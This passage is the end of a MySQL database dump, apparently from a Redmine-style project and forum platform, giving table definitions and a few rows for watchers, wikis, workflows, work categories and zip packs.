20:49:30'),(56,'Memo',288,111,'2020-07-13 10:24:52'),(57,'Memo',274,111,'2020-07-13 10:24:55'),(58,'ForumSection',3,111,'2020-07-13 10:36:22'),(62,'ForumSection',11,111,'2020-07-24 14:59:32'),(65,'ForumSection',5,111,'2020-07-24 15:01:35'),(66,'ForumSection',6,111,'2020-07-24 15:01:35'),(67,'ForumSection',7,111,'2020-07-24 15:01:35'),(68,'ForumSection',13,111,'2020-07-24 15:01:42'),(70,'ForumSection',4,111,'2020-07-24 15:02:56'),(74,'ForumSection',9,111,'2020-07-28 11:40:53'),(75,'ForumSection',12,1,'2020-08-03 17:16:00'),(79,'Project',376,46,'2020-08-14 00:49:49'),(80,'Project',376,1,'2020-08-18 01:11:46'),(83,'ForumSection',13,1,'2020-08-21 09:31:30'),(84,'ForumSection',14,1,'2020-08-21 09:31:35'),(85,'Memo',2,46,'2020-08-24 09:27:46'),(86,'Principal',46,47,'2020-08-25 11:40:14'),(89,'Principal',111,1,'2020-09-16 10:41:21'),(90,'Principal',46,1,'2020-10-14 17:08:01'),(94,'Principal',1,127,'2020-12-22 19:50:08'),(96,'ForumSection',38,152,'2021-01-08 15:22:06'),(101,'Project',494,49,'2021-02-22 08:33:11'),(102,'Memo',2,49,'2021-02-24 10:32:13'),(103,'ForumSection',38,49,'2021-02-24 10:32:42'),(104,'Memo',343,49,'2021-02-24 10:33:23'),(105,'User',128,48,'2021-03-01 06:26:23'),(107,'Project',477,165,'2021-03-06 08:45:16'),(108,'Project',477,207,'2021-03-06 12:44:52'),(109,'User',48,133,'2021-03-09 06:56:12'),(110,'Project',477,211,'2021-03-09 07:47:53'),(111,'Project',517,190,'2021-03-09 08:27:38'),(112,'User',115,214,'2021-03-09 08:46:38');
|
||
/*!40000 ALTER TABLE `watchers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `web_footer_companies`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `web_footer_companies`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `web_footer_companies` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`logo_size` varchar(255) DEFAULT NULL,
|
||
`url` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `web_footer_companies`
|
||
--
|
||
|
||
LOCK TABLES `web_footer_companies` WRITE;
|
||
/*!40000 ALTER TABLE `web_footer_companies` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `web_footer_companies` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `web_footer_oranizers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `web_footer_oranizers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `web_footer_oranizers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `web_footer_oranizers`
|
||
--
|
||
|
||
LOCK TABLES `web_footer_oranizers` WRITE;
|
||
/*!40000 ALTER TABLE `web_footer_oranizers` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `web_footer_oranizers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `wiki_content_versions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `wiki_content_versions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `wiki_content_versions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`wiki_content_id` int(11) NOT NULL,
|
||
`page_id` int(11) NOT NULL,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`data` longblob,
|
||
`compression` varchar(6) DEFAULT '',
|
||
`comments` varchar(255) DEFAULT '',
|
||
`updated_on` datetime NOT NULL,
|
||
`version` int(11) NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `wiki_content_versions_wcid` (`wiki_content_id`),
|
||
KEY `index_wiki_content_versions_on_updated_on` (`updated_on`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `wiki_content_versions`
|
||
--
|
||
|
||
LOCK TABLES `wiki_content_versions` WRITE;
|
||
/*!40000 ALTER TABLE `wiki_content_versions` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `wiki_content_versions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `wiki_contents`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `wiki_contents`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `wiki_contents` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`page_id` int(11) NOT NULL,
|
||
`author_id` int(11) DEFAULT NULL,
|
||
`text` longtext,
|
||
`comments` varchar(255) DEFAULT '',
|
||
`updated_on` datetime NOT NULL,
|
||
`version` int(11) NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `wiki_contents_page_id` (`page_id`),
|
||
KEY `index_wiki_contents_on_author_id` (`author_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `wiki_contents`
|
||
--
|
||
|
||
LOCK TABLES `wiki_contents` WRITE;
|
||
/*!40000 ALTER TABLE `wiki_contents` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `wiki_contents` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `wiki_pages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `wiki_pages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `wiki_pages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`wiki_id` int(11) NOT NULL,
|
||
`title` varchar(255) NOT NULL,
|
||
`created_on` datetime NOT NULL,
|
||
`protected` tinyint(1) NOT NULL DEFAULT '0',
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `wiki_pages_wiki_id_title` (`wiki_id`,`title`),
|
||
KEY `index_wiki_pages_on_wiki_id` (`wiki_id`),
|
||
KEY `index_wiki_pages_on_parent_id` (`parent_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `wiki_pages`
|
||
--
|
||
|
||
LOCK TABLES `wiki_pages` WRITE;
|
||
/*!40000 ALTER TABLE `wiki_pages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `wiki_pages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `wiki_redirects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `wiki_redirects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `wiki_redirects` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`wiki_id` int(11) NOT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`redirects_to` varchar(255) DEFAULT NULL,
|
||
`created_on` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `wiki_redirects_wiki_id_title` (`wiki_id`,`title`),
|
||
KEY `index_wiki_redirects_on_wiki_id` (`wiki_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `wiki_redirects`
|
||
--
|
||
|
||
LOCK TABLES `wiki_redirects` WRITE;
|
||
/*!40000 ALTER TABLE `wiki_redirects` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `wiki_redirects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `wikis`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `wikis`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `wikis` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL,
|
||
`start_page` varchar(255) NOT NULL,
|
||
`status` int(11) NOT NULL DEFAULT '1',
|
||
PRIMARY KEY (`id`),
|
||
KEY `wikis_project_id` (`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=276 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `wikis`
|
||
--
|
||
|
||
LOCK TABLES `wikis` WRITE;
|
||
/*!40000 ALTER TABLE `wikis` DISABLE KEYS */;
|
||
INSERT INTO `wikis` VALUES (25,25,'Wiki',1),(28,28,'Wiki',1),(29,29,'Wiki',1),(31,31,'Wiki',1),(32,32,'Wiki',1),(34,34,'Wiki',1),(38,38,'Wiki',1),(41,41,'Wiki',1),(42,42,'Wiki',1),(43,43,'Wiki',1),(54,54,'Wiki',1),(57,57,'Wiki',1),(58,58,'Wiki',1),(59,59,'Wiki',1),(60,60,'Wiki',1),(61,61,'Wiki',1),(62,62,'Wiki',1),(63,63,'Wiki',1),(64,64,'Wiki',1),(65,65,'Wiki',1),(66,66,'Wiki',1),(67,67,'Wiki',1),(69,69,'Wiki',1),(70,70,'Wiki',1),(73,73,'Wiki',1),(76,76,'Wiki',1),(78,78,'Wiki',1),(79,79,'Wiki',1),(80,80,'Wiki',1),(81,81,'Wiki',1),(82,82,'Wiki',1),(99,99,'Wiki',1),(100,100,'Wiki',1),(101,101,'Wiki',1),(102,102,'Wiki',1),(103,103,'Wiki',1),(120,120,'Wiki',1),(127,127,'Wiki',1),(129,129,'Wiki',1),(130,130,'Wiki',1),(131,131,'Wiki',1),(132,132,'Wiki',1),(137,137,'Wiki',1),(139,139,'Wiki',1),(140,140,'Wiki',1),(141,141,'Wiki',1),(143,143,'Wiki',1),(144,144,'Wiki',1),(156,156,'Wiki',1),(157,157,'Wiki',1),(158,158,'Wiki',1),(159,159,'Wiki',1),(161,161,'Wiki',1),(169,169,'Wiki',1),(178,178,'Wiki',1),(199,199,'Wiki',1),(200,200,'Wiki',1),(203,203,'Wiki',1),(204,204,'Wiki',1),(205,205,'Wiki',1),(217,217,'Wiki',1),(219,219,'Wiki',1),(221,221,'Wiki',1),(223,223,'Wiki',1),(224,224,'Wiki',1),(225,225,'Wiki',1),(226,226,'Wiki',1),(228,228,'Wiki',1),(230,230,'Wiki',1),(231,231,'Wiki',1),(232,232,'Wiki',1),(233,233,'Wiki',1),(248,248,'Wiki',1),(250,250,'Wiki',1),(251,251,'Wiki',1),(252,252,'Wiki',1),(253,253,'Wiki',1),(254,254,'Wiki',1),(255,255,'Wiki',1),(256,256,'Wiki',1),(257,257,'Wiki',1),(258,258,'Wiki',1),(259,259,'Wiki',1),(261,261,'Wiki',1),(262,262,'Wiki',1),(263,263,'Wiki',1),(264,264,'Wiki',1),(265,265,'Wiki',1),(266,266,'Wiki',1),(267,267,'Wiki',1),(268,268,'Wiki',1),(269,269,'Wiki',1),(270,270,'Wiki',1),(271,271,'Wiki',1),(272,272,'Wiki',1),(273,273,'Wiki',1),(274,274,'Wiki',1),(275,275,'Wiki',1);
|
||
/*!40000 ALTER TABLE `wikis` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `workflows`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `workflows`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `workflows` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`tracker_id` int(11) NOT NULL DEFAULT '0',
|
||
`old_status_id` int(11) NOT NULL DEFAULT '0',
|
||
`new_status_id` int(11) NOT NULL DEFAULT '0',
|
||
`role_id` int(11) NOT NULL DEFAULT '0',
|
||
`assignee` tinyint(1) NOT NULL DEFAULT '0',
|
||
`author` tinyint(1) NOT NULL DEFAULT '0',
|
||
`type` varchar(30) DEFAULT NULL,
|
||
`field_name` varchar(30) DEFAULT NULL,
|
||
`rule` varchar(30) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `wkfs_role_tracker_old_status` (`role_id`,`tracker_id`,`old_status_id`),
|
||
KEY `index_workflows_on_old_status_id` (`old_status_id`),
|
||
KEY `index_workflows_on_role_id` (`role_id`),
|
||
KEY `index_workflows_on_new_status_id` (`new_status_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=37 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `workflows`
|
||
--
|
||
|
||
LOCK TABLES `workflows` WRITE;
|
||
/*!40000 ALTER TABLE `workflows` DISABLE KEYS */;
|
||
INSERT INTO `workflows` VALUES (1,1,1,1,3,0,0,'WorkflowTransition',NULL,NULL),(2,1,1,2,3,0,0,'WorkflowTransition',NULL,NULL),(3,1,1,3,3,0,0,'WorkflowTransition',NULL,NULL),(4,1,1,4,3,0,0,'WorkflowTransition',NULL,NULL),(5,1,1,5,3,0,0,'WorkflowTransition',NULL,NULL),(6,1,1,6,3,0,0,'WorkflowTransition',NULL,NULL),(7,1,2,1,3,0,0,'WorkflowTransition',NULL,NULL),(8,1,2,2,3,0,0,'WorkflowTransition',NULL,NULL),(9,1,2,3,3,0,0,'WorkflowTransition',NULL,NULL),(10,1,2,4,3,0,0,'WorkflowTransition',NULL,NULL),(11,1,2,5,3,0,0,'WorkflowTransition',NULL,NULL),(12,1,2,6,3,0,0,'WorkflowTransition',NULL,NULL),(13,1,3,1,3,0,0,'WorkflowTransition',NULL,NULL),(14,1,3,2,3,0,0,'WorkflowTransition',NULL,NULL),(15,1,3,3,3,0,0,'WorkflowTransition',NULL,NULL),(16,1,3,4,3,0,0,'WorkflowTransition',NULL,NULL),(17,1,3,5,3,0,0,'WorkflowTransition',NULL,NULL),(18,1,3,6,3,0,0,'WorkflowTransition',NULL,NULL),(19,1,4,1,3,0,0,'WorkflowTransition',NULL,NULL),(20,1,4,2,3,0,0,'WorkflowTransition',NULL,NULL),(21,1,4,3,3,0,0,'WorkflowTransition',NULL,NULL),(22,1,4,4,3,0,0,'WorkflowTransition',NULL,NULL),(23,1,4,5,3,0,0,'WorkflowTransition',NULL,NULL),(24,1,4,6,3,0,0,'WorkflowTransition',NULL,NULL),(25,1,5,1,3,0,0,'WorkflowTransition',NULL,NULL),(26,1,5,2,3,0,0,'WorkflowTransition',NULL,NULL),(27,1,5,3,3,0,0,'WorkflowTransition',NULL,NULL),(28,1,5,4,3,0,0,'WorkflowTransition',NULL,NULL),(29,1,5,5,3,0,0,'WorkflowTransition',NULL,NULL),(30,1,5,6,3,0,0,'WorkflowTransition',NULL,NULL),(31,1,6,1,3,0,0,'WorkflowTransition',NULL,NULL),(32,1,6,2,3,0,0,'WorkflowTransition',NULL,NULL),(33,1,6,3,3,0,0,'WorkflowTransition',NULL,NULL),(34,1,6,4,3,0,0,'WorkflowTransition',NULL,NULL),(35,1,6,5,3,0,0,'WorkflowTransition',NULL,NULL),(36,1,6,6,3,0,0,'WorkflowTransition',NULL,NULL);
|
||
/*!40000 ALTER TABLE `workflows` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `works_categories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `works_categories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `works_categories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`category` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `works_categories`
|
||
--
|
||
|
||
LOCK TABLES `works_categories` WRITE;
|
||
/*!40000 ALTER TABLE `works_categories` DISABLE KEYS */;
|
||
INSERT INTO `works_categories` VALUES (24,'开源软件','2018-07-02 11:23:05','2018-07-02 11:23:05'),(25,'移动APP','2018-07-02 11:23:05','2018-07-02 11:23:05'),(26,'其他','2018-07-02 11:23:05','2018-07-02 11:23:05');
|
||
/*!40000 ALTER TABLE `works_categories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `zip_packs`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `zip_packs`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `zip_packs` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`homework_id` int(11) DEFAULT NULL,
|
||
`file_digest` varchar(255) DEFAULT NULL,
|
||
`file_path` varchar(255) DEFAULT NULL,
|
||
`pack_times` int(11) DEFAULT '1',
|
||
`pack_size` int(11) DEFAULT '0',
|
||
`file_digests` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `zip_packs`
|
||
--
|
||
|
||
LOCK TABLES `zip_packs` WRITE;
|
||
/*!40000 ALTER TABLE `zip_packs` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `zip_packs` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
|
||
|
||
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
|
||
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
|
||
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
|
||
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
|
||
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
|
||
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
|
||
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
|
||
|
||
-- Dump completed on 2021-03-22 10:00:48
|